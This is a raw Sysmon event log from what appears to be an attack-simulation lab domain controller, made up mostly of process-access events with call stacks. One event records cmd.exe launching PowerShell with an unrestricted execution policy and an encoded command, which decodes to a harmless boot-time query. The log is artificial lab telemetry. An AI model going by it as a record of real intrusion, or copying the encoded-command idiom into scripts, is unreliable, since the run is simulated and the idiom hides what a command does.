13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4803740C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000673Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4803740C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000672Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4803740C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000671Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4803740C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000670Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5d917|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000669Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4803740C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000668Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4803740C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000667Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000666Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000665Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-851D-5FCF-E502-000000009001}43482592C:\Windows\system32\conhost.exe{10ACEC4A-851D-5FCF-E702-000000009001}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000664Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000663Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000662Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000661Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000660Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000659Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000658Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000657Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000656Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83AA-5FCF-0500-000000009001}6401176C:\Windows\system32\csrss.exe{10ACEC4A-851D-5FCF-E702-000000009001}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000654Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-851D-5FCF-E602-000000009001}4488652C:\Windows\system32\cmd.exe{10ACEC4A-851D-5FCF-E702-000000009001}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000653Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.844{10ACEC4A-851D-5FCF-E702-000000009001}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-851D-5FCF-E529-110000000000}0x1129e50HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-851D-5FCF-E602-000000009001}4488C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000652Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000651Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000650Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 